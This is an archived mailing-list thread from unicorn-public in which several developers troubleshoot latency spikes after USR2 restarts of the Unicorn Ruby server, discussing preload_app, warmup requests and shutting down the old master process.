>       Process.kill("QUIT", File.read(old_pid).to_i)
>     rescue Errno::ENOENT, Errno::ESRCH
>       # someone else did our job for us
>     end
>   end
-------------------8<-------------------

I'd get rid of that hunk starting with the "sleep 10" (at least while
debugging this issue).  If you did a USR2 previously, maybe it could
affect the current USR2 upgrade process.  Sleeping so long in the master
like that is pretty bad; it throws off timing and delays signal handling.

That's a pretty fragile config and I regret ever including it in the
example config files.
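Done as a separate deploy step (rather than in before_fork), the
old-master shutdown can be as small as this sketch; the pid path is the
one from this thread and purely illustrative:

```ruby
# Separate deploy step: signal the old master via its .oldbin pid file.
old = '/srv/ourapp/shared/pids/unicorn.pid.oldbin' # illustrative path
killed = false
if File.exist?(old)
  begin
    Process.kill(:QUIT, File.read(old).to_i) # graceful shutdown
    killed = true
  rescue Errno::ESRCH, Errno::ENOENT
    # old master already exited; nothing to do
  end
end
```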

^ permalink raw reply	[relevance 4%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:28  0%                     ` Sarkis Varozian
  2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
@ 2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-03-05 17:32 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Eric Wong, Michael Fischer, unicorn-public

I also use newrelic and never saw this grey part...

On Thu, Mar 5, 2015 at 2:28 PM, Sarkis Varozian <svarozian@gmail.com> wrote:

> Braulio,
>
> Are you referring to the vertical grey line? That is the deployment event.
> The part that spikes in the first graph is request queue which is a bit
> different on newrelic:
> http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/
>
> We are using HAProxy to load balance (round robin) to 4 physical hosts
> running unicorn with 6 workers.
>
> I have not tried to reproduce this on 1 master - I assume this would be
> the same.
>
> I do in fact do the sleep now:
> https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
> the deployment results above had the 1 second sleep in there.
>
> On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> In the graphs you posted, what is the grey part? It is not described in
>> the legend and it seems the problem is entirely there. What reverse proxy
>> are you using?
>>
>> Can you reproduce this with a single master instance?
>>
>> Could you try this sleep:
>> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>>
>>
>> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Hey All,
>>>
>>> So I changed up my unicorn.rb a bit from my original post:
>>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>>
>>> I'm also still sending the USR2 signals on deploy staggered with 30
>>> second delay via capistrano:
>>>
>>> on roles(:web), in: :sequence, wait: 30
>>>
>>> As you can see I am now doing a warmup via rack MockRequest (I hoped this
>>> would warmup the master). However, this is what a deploy looks like on
>>> newrelic:
>>>
>>>
>>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>>
>>>
>>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>>
>>> I'm running out of ideas to get rid of these latency spikes. Would you
>>> guys recommend I try anything else at this point?
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Eric,
>>>>
>>>> Thanks for the quick reply.
>>>>
>>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is
>>>> the lazy loading - at least thats what all signs point to. I am going to
>>>> try and mock request some url endpoints. Currently, I can only think of
>>>> '/', as most other parts of the app require a session and auth. I'll report
>>>> back with results.
>>>>
>>>>
>>>>
>>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>>
>>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>>> mfischer@zendesk.com>
>>>>> > wrote:
>>>>> >
>>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>>> is
>>>>> > > lazy-loading a number of Ruby libraries while handling the first
>>>>> few
>>>>> > > requests that weren't automatically loaded during the preload
>>>>> process.
>>>>> > >
>>>>> > > Eric, your thoughts?
>>>>>
>>>>> (top-posting corrected)
>>>>>
>>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>>> autoloaded.
>>>>>
>>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>>> 1.9.2
>>>>>
>>>>> > That does make sense - I was looking at another suggestion from a
>>>>> user here
>>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>>> >
>>>>> > The only issue I am having with the above solution is it is
>>>>> happening in
>>>>> > the before_fork block - shouldn't I warmup the connection in
>>>>> after_fork?
>>>>>
>>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>>> needs to be after_fork.
>>>>>
>>>>> > If
>>>>> > I follow the above gist properly it warms up the server with the old
>>>>> > activerecord base connection and then its turned off, then turned
>>>>> back on
>>>>> > in after_fork. I think I am not understanding the sequence of events
>>>>> > there...
>>>>>
>>>>> With preload_app and warmup, you need to ensure any stream connections
>>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>>> child.
>>>>>
>>>>> > If this is the case, I should warmup and also check/kill the old
>>>>> > master in the after_fork block after the new db, redis, neo4j
>>>>> connections
>>>>> > are all created. Thoughts?
>>>>>
>>>>> I've been leaving killing the master outside of the unicorn hooks
>>>>> and doing it as a separate step; seemed too fragile to do it in
>>>>> hooks from my perspective.
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br



^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:28  0%                     ` Sarkis Varozian
@ 2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
  2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-03-05 17:31 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Eric Wong, Michael Fischer, unicorn-public

I would try to reproduce this locally with a production env and `ab -n 200
-c 2 http://localhost:3000/`



On Thu, Mar 5, 2015 at 2:28 PM, Sarkis Varozian <svarozian@gmail.com> wrote:

> Braulio,
>
> Are you referring to the vertical grey line? That is the deployment event.
> The part that spikes in the first graph is request queue which is a bit
> different on newrelic:
> http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/
>
> We are using HAProxy to load balance (round robin) to 4 physical hosts
> running unicorn with 6 workers.
>
> I have not tried to reproduce this on 1 master - I assume this would be
> the same.
>
> I do in fact do the sleep now:
> https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
> the deployment results above had the 1 second sleep in there.
>
> On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> In the graphs you posted, what is the grey part? It is not described in
>> the legend and it seems the problem is entirely there. What reverse proxy
>> are you using?
>>
>> Can you reproduce this with a single master instance?
>>
>> Could you try this sleep:
>> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>>
>>
>> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Hey All,
>>>
>>> So I changed up my unicorn.rb a bit from my original post:
>>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>>
>>> I'm also still sending the USR2 signals on deploy staggered with 30
>>> second delay via capistrano:
>>>
>>> on roles(:web), in: :sequence, wait: 30
>>>
>>> As you can see I am now doing a warmup via rack MockRequest (I hoped this
>>> would warmup the master). However, this is what a deploy looks like on
>>> newrelic:
>>>
>>>
>>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>>
>>>
>>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>>
>>> I'm running out of ideas to get rid of these latency spikes. Would you
>>> guys recommend I try anything else at this point?
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Eric,
>>>>
>>>> Thanks for the quick reply.
>>>>
>>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is
>>>> the lazy loading - at least thats what all signs point to. I am going to
>>>> try and mock request some url endpoints. Currently, I can only think of
>>>> '/', as most other parts of the app require a session and auth. I'll report
>>>> back with results.
>>>>
>>>>
>>>>
>>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>>
>>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>>> mfischer@zendesk.com>
>>>>> > wrote:
>>>>> >
>>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>>> is
>>>>> > > lazy-loading a number of Ruby libraries while handling the first
>>>>> few
>>>>> > > requests that weren't automatically loaded during the preload
>>>>> process.
>>>>> > >
>>>>> > > Eric, your thoughts?
>>>>>
>>>>> (top-posting corrected)
>>>>>
>>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>>> autoloaded.
>>>>>
>>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>>> 1.9.2
>>>>>
>>>>> > That does make sense - I was looking at another suggestion from a
>>>>> user here
>>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>>> >
>>>>> > The only issue I am having with the above solution is it is
>>>>> happening in
>>>>> > the before_fork block - shouldn't I warmup the connection in
>>>>> after_fork?
>>>>>
>>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>>> needs to be after_fork.
>>>>>
>>>>> > If
>>>>> > I follow the above gist properly it warms up the server with the old
>>>>> > activerecord base connection and then it's turned off, then turned
>>>>> back on
>>>>> > in after_fork. I think I am not understanding the sequence of events
>>>>> > there...
>>>>>
>>>>> With preload_app and warmup, you need to ensure any stream connections
>>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>>> child.
>>>>>
>>>>> > If this is the case, I should warmup and also check/kill the old
>>>>> > master in the after_fork block after the new db, redis, neo4j
>>>>> connections
>>>>> > are all created. Thoughts?
>>>>>
>>>>> I've been leaving killing the master outside of the unicorn hooks
>>>>> and doing it as a separate step; seemed too fragile to do it in
>>>>> hooks from my perspective.
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>> --
>> "Fight for your ideology. Be one with your ideology. Live for your
>> ideology. Die for your ideology." P.R. Sarkar
>>
>> EITA - Educação, Informação e Tecnologias para Autogestão
>> http://cirandas.net/brauliobo
>> http://eita.org.br
>>
>> "Paramapurusha is my father and Parama Prakriti is my mother. The
>> universe is my home and we are all citizens of this cosmos. This
>> universe is the imagination of the Macrocosmic Mind, and all entities
>> are being created, preserved and destroyed in the phases of
>> extroversion and introversion of the cosmic imaginative flow. On the
>> personal level, when a person imagines something in their mind, at
>> that moment that person is the sole owner of what they imagine, and no
>> one else. When a mentally created human being walks through an equally
>> imagined cornfield, the imagined person does not own that cornfield,
>> for it belongs to the individual who is imagining it. This universe
>> was created in the imagination of Brahma, the Supreme Entity, so this
>> universe belongs to Brahma, and not to the microcosms that were also
>> created by Brahma's imagination. No property of this world, mutable or
>> immutable, belongs to any particular individual; everything is the
>> common patrimony of all."
>> Rest of the text at
>> http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>





^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:13  0%                   ` Bráulio Bhavamitra
@ 2015-03-05 17:28  0%                     ` Sarkis Varozian
  2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
  2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  0 siblings, 2 replies; 200+ results
From: Sarkis Varozian @ 2015-03-05 17:28 UTC (permalink / raw)
  To: Bráulio Bhavamitra; +Cc: Eric Wong, Michael Fischer, unicorn-public

Braulio,

Are you referring to the vertical grey line? That is the deployment event.
The part that spikes in the first graph is request queue which is a bit
different on newrelic:
http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/

We are using HAProxy to load balance (round robin) to 4 physical hosts
running unicorn with 6 workers.

I have not tried to reproduce this on 1 master - I assume this would be the
same.

I do in fact do the sleep now:
https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
the deployment results above had the 1 second sleep in there.

On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
wrote:

> In the graphs you posted, what is the grey part? It is not described in
> the legend and it seems the problem is entirely there. What reverse proxy
> are you using?
>
> Can you reproduce this with a single master instance?
>
> Could you try this sleep:
> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>
>
> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Hey All,
>>
>> So I changed up my unicorn.rb a bit from my original post:
>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>
>> I'm also still sending the USR2 signals on deploy staggered with 30
>> second delay via capistrano:
>>
>> on roles(:web), in: :sequence, wait: 30
>>
>> As you can see I am now doing a warmup via rack MockRequest (I hoped this
>> would warmup the master). However, this is what a deploy looks like on
>> newrelic:
>>
>>
>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>
>>
>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>
>> I'm running out of ideas to get rid of these latency spikes. Would you
>> guys recommend I try anything else at this point?
>>
>>
>>
>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Eric,
>>>
>>> Thanks for the quick reply.
>>>
>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is the
>>> lazy loading - at least that's what all signs point to. I am going to try
>>> and mock request some url endpoints. Currently, I can only think of '/', as
>>> most other parts of the app require a session and auth. I'll report back
>>> with results.
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>
>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>> mfischer@zendesk.com>
>>>> > wrote:
>>>> >
>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>> is
>>>> > > lazy-loading a number of Ruby libraries while handling the first few
>>>> > > requests that weren't automatically loaded during the preload
>>>> process.
>>>> > >
>>>> > > Eric, your thoughts?
>>>>
>>>> (top-posting corrected)
>>>>
>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>> autoloaded.
>>>>
>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>> 1.9.2
>>>>
>>>> > That does make sense - I was looking at another suggestion from a
>>>> user here
>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>> >
>>>> > The only issue I am having with the above solution is it is happening
>>>> in
>>>> > the before_fork block - shouldn't I warmup the connection in
>>>> after_fork?
>>>>
>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>> needs to be after_fork.
>>>>
>>>> > If
>>>> > I follow the above gist properly it warms up the server with the old
>>>> > activerecord base connection and then it's turned off, then turned
>>>> back on
>>>> > in after_fork. I think I am not understanding the sequence of events
>>>> > there...
>>>>
>>>> With preload_app and warmup, you need to ensure any stream connections
>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>> child.
>>>>
>>>> > If this is the case, I should warmup and also check/kill the old
>>>> > master in the after_fork block after the new db, redis, neo4j
>>>> connections
>>>> > are all created. Thoughts?
>>>>
>>>> I've been leaving killing the master outside of the unicorn hooks
>>>> and doing it as a separate step; seemed too fragile to do it in
>>>> hooks from my perspective.
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>
>
>



-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:07  0%                 ` Sarkis Varozian
@ 2015-03-05 17:13  0%                   ` Bráulio Bhavamitra
  2015-03-05 17:28  0%                     ` Sarkis Varozian
  0 siblings, 1 reply; 200+ results
From: Bráulio Bhavamitra @ 2015-03-05 17:13 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Eric Wong, Michael Fischer, unicorn-public

In the graphs you posted, what is the grey part? It is not described in the
legend and it seems the problem is entirely there. What reverse proxy are
you using?

Can you reproduce this with a single master instance?

Could you try this sleep:
https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
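A sleep of that sort typically amounts to something like this in unicorn.rb (a sketch, not the actual contents of the gist linked above):

```ruby
# unicorn.rb (excerpt) -- sketch of a worker-spawn stagger; a guess at
# the idea behind the linked gist, not its actual contents.
after_fork do |server, worker|
  # worker.nr is 0, 1, 2, ...; later workers wait a little longer so
  # they don't all compete for CPU/IO while warming up at once.
  sleep(worker.nr)
end
```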


On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com> wrote:

> Hey All,
>
> So I changed up my unicorn.rb a bit from my original post:
> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>
> I'm also still sending the USR2 signals on deploy staggered with 30 second
> delay via capistrano:
>
> on roles(:web), in: :sequence, wait: 30
>
> As you can see I am now doing a warmup via rack MockRequest (I hoped this
> would warmup the master). However, this is what a deploy looks like on
> newrelic:
>
>
> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>
>
> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>
> I'm running out of ideas to get rid of these latency spikes. Would you guys
> recommend I try anything else at this point?
>
>
>
> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Eric,
>>
>> Thanks for the quick reply.
>>
>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is the
>> lazy loading - at least that's what all signs point to. I am going to try
>> and mock request some url endpoints. Currently, I can only think of '/', as
>> most other parts of the app require a session and auth. I'll report back
>> with results.
>>
>>
>>
>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>
>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com
>>> >
>>> > wrote:
>>> >
>>> > > I'm not exactly sure how preload_app works, but I suspect your app is
>>> > > lazy-loading a number of Ruby libraries while handling the first few
>>> > > requests that weren't automatically loaded during the preload
>>> process.
>>> > >
>>> > > Eric, your thoughts?
>>>
>>> (top-posting corrected)
>>>
>>> Yeah, preload_app won't help startup speed if much of the app is
>>> autoloaded.
>>>
>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>> 1.9.2
>>>
>>> > That does make sense - I was looking at another suggestion from a user
>>> here
>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>> >
>>> > The only issue I am having with the above solution is it is happening
>>> in
>>> > the before_fork block - shouldn't I warmup the connection in
>>> after_fork?
>>>
>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>> needs to be after_fork.
>>>
>>> > If
>>> > I follow the above gist properly it warms up the server with the old
>>> > activerecord base connection and then it's turned off, then turned back
>>> on
>>> > in after_fork. I think I am not understanding the sequence of events
>>> > there...
>>>
>>> With preload_app and warmup, you need to ensure any stream connections
>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>> it's standard practice to disconnect in the parent and reconnect in the
>>> child.
>>>
>>> > If this is the case, I should warmup and also check/kill the old
>>> > master in the after_fork block after the new db, redis, neo4j
>>> connections
>>> > are all created. Thoughts?
>>>
>>> I've been leaving killing the master outside of the unicorn hooks
>>> and doing it as a separate step; seemed too fragile to do it in
>>> hooks from my perspective.
>>>
>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>





^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:40  0%               ` Sarkis Varozian
@ 2015-03-05 17:07  0%                 ` Sarkis Varozian
  2015-03-05 17:13  0%                   ` Bráulio Bhavamitra
  0 siblings, 1 reply; 200+ results
From: Sarkis Varozian @ 2015-03-05 17:07 UTC (permalink / raw)
  To: Eric Wong; +Cc: Michael Fischer, unicorn-public, Bráulio Bhavamitra

Hey All,

So I changed up my unicorn.rb a bit from my original post:
https://gist.github.com/sarkis/1aa296044b1dfd3695ab

I'm also still sending the USR2 signals on deploy staggered with 30 second
delay via capistrano:

on roles(:web), in: :sequence, wait: 30
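Spelled out as a full Capistrano 3 task, that staggered restart looks roughly like this (a sketch; the task name and pid-file path are hypothetical):

```ruby
# lib/capistrano/tasks/unicorn.rake (hypothetical location)
namespace :unicorn do
  desc 'Rolling USR2 restart: one web host at a time, 30s apart'
  task :restart do
    on roles(:web), in: :sequence, wait: 30 do
      # USR2 makes the running master exec a new master from the
      # freshly deployed code while the old one keeps serving.
      execute :kill, '-USR2', "$(cat #{shared_path}/tmp/pids/unicorn.pid)"
    end
  end
end
```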

As you can see I am now doing a warmup via rack MockRequest (I hoped this
would warmup the master). However, this is what a deploy looks like on
newrelic:

https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0

https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0

I'm running out of ideas to get rid of these latency spikes. Would you guys
recommend I try anything else at this point?
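The MockRequest warmup referenced above looks roughly like this in unicorn.rb (a sketch, not the actual gist contents; assumes preload_app true and a Rails app, and the warmed path is a placeholder for a cheap, auth-free endpoint):

```ruby
# unicorn.rb (excerpt) -- sketch of a MockRequest warmup in the master.
require 'rack/mock'

preload_app true

before_fork do |server, worker|
  # Hit the preloaded app once in the master so autoloaded constants,
  # compiled templates, etc. are resident before workers fork.
  mock = Rack::MockRequest.new(Rails.application)
  mock.get('/')

  # Anything the warmup connected must not survive the fork.
  if defined?(ActiveRecord::Base)
    ActiveRecord::Base.connection_pool.disconnect!
  end
end

after_fork do |server, worker|
  # Fresh per-worker connections.
  ActiveRecord::Base.establish_connection if defined?(ActiveRecord::Base)
end
```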



On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
wrote:

> Eric,
>
> Thanks for the quick reply.
>
> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is the
> lazy loading - at least that's what all signs point to. I am going to try
> and mock request some url endpoints. Currently, I can only think of '/', as
> most other parts of the app require a session and auth. I'll report back
> with results.
>
>
>
> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>
>> Sarkis Varozian <svarozian@gmail.com> wrote:
>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
>> > wrote:
>> >
>> > > I'm not exactly sure how preload_app works, but I suspect your app is
>> > > lazy-loading a number of Ruby libraries while handling the first few
>> > > requests that weren't automatically loaded during the preload process.
>> > >
>> > > Eric, your thoughts?
>>
>> (top-posting corrected)
>>
>> Yeah, preload_app won't help startup speed if much of the app is
>> autoloaded.
>>
>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>> startup performance compared to 1.9.3 and later in case you're stuck on
>> 1.9.2
>>
>> > That does make sense - I was looking at another suggestion from a user
>> here
>> > (Braulio) of running a "warmup" using rack MockRequest:
>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>> >
>> > The only issue I am having with the above solution is it is happening in
>> > the before_fork block - shouldn't I warmup the connection in after_fork?
>>
>> If preload_app is true, you can warmup in before_fork; otherwise it
>> needs to be after_fork.
>>
>> > If
>> > I follow the above gist properly it warms up the server with the old
>> > activerecord base connection and then it's turned off, then turned back
>> on
>> > in after_fork. I think I am not understanding the sequence of events
>> > there...
>>
>> With preload_app and warmup, you need to ensure any stream connections
>> (DB, memcached, redis, etc..) do not get shared between processes, so
>> it's standard practice to disconnect in the parent and reconnect in the
>> child.
>>
>> > If this is the case, I should warmup and also check/kill the old
>> > master in the after_fork block after the new db, redis, neo4j
>> connections
>> > are all created. Thoughts?
>>
>> I've been leaving killing the master outside of the unicorn hooks
>> and doing it as a separate step; seemed too fragile to do it in
>> hooks from my perspective.
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>



-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:35  0%             ` Eric Wong
@ 2015-03-04 20:40  0%               ` Sarkis Varozian
  2015-03-05 17:07  0%                 ` Sarkis Varozian
  0 siblings, 1 reply; 200+ results
From: Sarkis Varozian @ 2015-03-04 20:40 UTC (permalink / raw)
  To: Eric Wong; +Cc: Michael Fischer, unicorn-public

Eric,

Thanks for the quick reply.

We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is the
lazy loading - at least that's what all signs point to. I am going to try
and mock request some url endpoints. Currently, I can only think of '/', as
most other parts of the app require a session and auth. I'll report back
with results.



On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:

> Sarkis Varozian <svarozian@gmail.com> wrote:
> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
> > wrote:
> >
> > > I'm not exactly sure how preload_app works, but I suspect your app is
> > > lazy-loading a number of Ruby libraries while handling the first few
> > > requests that weren't automatically loaded during the preload process.
> > >
> > > Eric, your thoughts?
>
> (top-posting corrected)
>
> Yeah, preload_app won't help startup speed if much of the app is
> autoloaded.
>
> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
> startup performance compared to 1.9.3 and later in case you're stuck on
> 1.9.2
>
> > That does make sense - I was looking at another suggestion from a user
> here
> > (Braulio) of running a "warmup" using rack MockRequest:
> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
> >
> > The only issue I am having with the above solution is it is happening in
> > the before_fork block - shouldn't I warmup the connection in after_fork?
>
> If preload_app is true, you can warmup in before_fork; otherwise it
> needs to be after_fork.
>
> > If
> > I follow the above gist properly it warms up the server with the old
> > activerecord base connection and then it's turned off, then turned back on
> > in after_fork. I think I am not understanding the sequence of events
> > there...
>
> With preload_app and warmup, you need to ensure any stream connections
> (DB, memcached, redis, etc..) do not get shared between processes, so
> it's standard practice to disconnect in the parent and reconnect in the
> child.
>
> > If this is the case, I should warmup and also check/kill the old
> > master in the after_fork block after the new db, redis, neo4j connections
> > are all created. Thoughts?
>
> I've been leaving killing the master outside of the unicorn hooks
> and doing it as a separate step; seemed too fragile to do it in
> hooks from my perspective.
>



-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:24  4%           ` Sarkis Varozian
  2015-03-04 20:27  0%             ` Michael Fischer
@ 2015-03-04 20:35  0%             ` Eric Wong
  2015-03-04 20:40  0%               ` Sarkis Varozian
  1 sibling, 1 reply; 200+ results
From: Eric Wong @ 2015-03-04 20:35 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Michael Fischer, unicorn-public

Sarkis Varozian <svarozian@gmail.com> wrote:
> On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
> wrote:
> 
> > I'm not exactly sure how preload_app works, but I suspect your app is
> > lazy-loading a number of Ruby libraries while handling the first few
> > requests that weren't automatically loaded during the preload process.
> >
> > Eric, your thoughts?

(top-posting corrected)

Yeah, preload_app won't help startup speed if much of the app is
autoloaded.

Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
startup performance compared to 1.9.3 and later in case you're stuck on
1.9.2

> That does make sense - I was looking at another suggestion from a user here
> (Braulio) of running a "warmup" using rack MockRequest:
